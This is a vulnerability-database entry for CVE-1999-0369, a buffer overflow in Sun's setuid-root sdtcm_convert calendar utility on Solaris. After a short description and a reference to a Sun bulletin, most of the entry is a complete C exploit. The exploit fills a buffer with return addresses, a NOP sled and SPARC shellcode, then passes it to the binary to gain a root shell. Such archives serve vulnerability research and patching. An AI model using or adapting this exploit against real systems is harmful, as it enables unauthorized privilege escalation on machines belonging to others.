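OpenWindows Sun sdtcm_convert Calendar Utility Permissions and Access Control Vulnerability
Vulnerability ID | 1105382 | Vulnerability type | Buffer overflow |
Published | 1998-10-23 | Updated | 2005-05-02 |
CVE ID | CVE-1999-0369 |
CNNVD-ID | CNNVD-199702-001 |
Platform | Solaris | CVSS score | 7.2 |
|Vulnerability source
|Vulnerability details
The sdtcm_convert calendar utility in Sun OpenWindows contains a buffer overflow vulnerability. The vulnerability can be exploited to gain root access.
|Exploit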
/*
source: http://www.securityfocus.com/bid/166/info
Sdtcm_convert is a setuid-root data conversion utility which converts OpenWindows version 3 calendar data files to version 4 and vice versa. A buffer overflow condition has been found in sdtcm_convert which may be exploited to obtain root access.
*/
/*=============================================================================
sdtcm_convert Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN ([email protected])
[usage]
% gcc ex_sdtcm_convert.c (This example program)
% a.out
If no response, hit ctrl+c
#
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define ADJUST  2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30
#define NOP     0xa61cc013

/* SPARC machine code placed in the argument buffer */
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* Returns the current stack pointer (value is left in %i0 by the asm) */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
int i;

int main(void)
{
    static char x[11000];

    memset(x, 'a', 10000);

    /* First 5000 bytes: repeated big-endian address */
    ret_adr = get_sp() - 6300;
    for (i = 0; i < 5000; i += 4) {
        x[i+3] = ret_adr & 0xff;
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }

    /* Second address block at OFFSET1; avoid a zero low byte,
       which would terminate the argument string */
    ret_adr = get_sp() - 10200;
    if ((ret_adr & 0xff) == 0) ret_adr += 4;
    printf("%lx\n", ret_adr);
    for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1; i += 4) {
        x[i+3] = ret_adr & 0xff;
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }

    /* NOP block at OFFSET2 */
    for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2; i += 4) {
        x[i+3] = NOP & 0xff;
        x[i+2] = (NOP >> 8) & 0xff;
        x[i+1] = (NOP >> 16) & 0xff;
        x[i+0] = (NOP >> 24) & 0xff;
    }

    /* Machine code copied in at OFFSET3 */
    for (i = 0; i < strlen(exploit_code); i++)
        x[OFFSET3+ADJUST+i] = exploit_code[i];
    x[10000] = 0;

    /* The oversized string is passed as the -d argument of the setuid-root binary */
    execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert",
          "-d", x, "test", (char *) 0);
}
|References
Source: SUN
Name: 00183
Link: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/183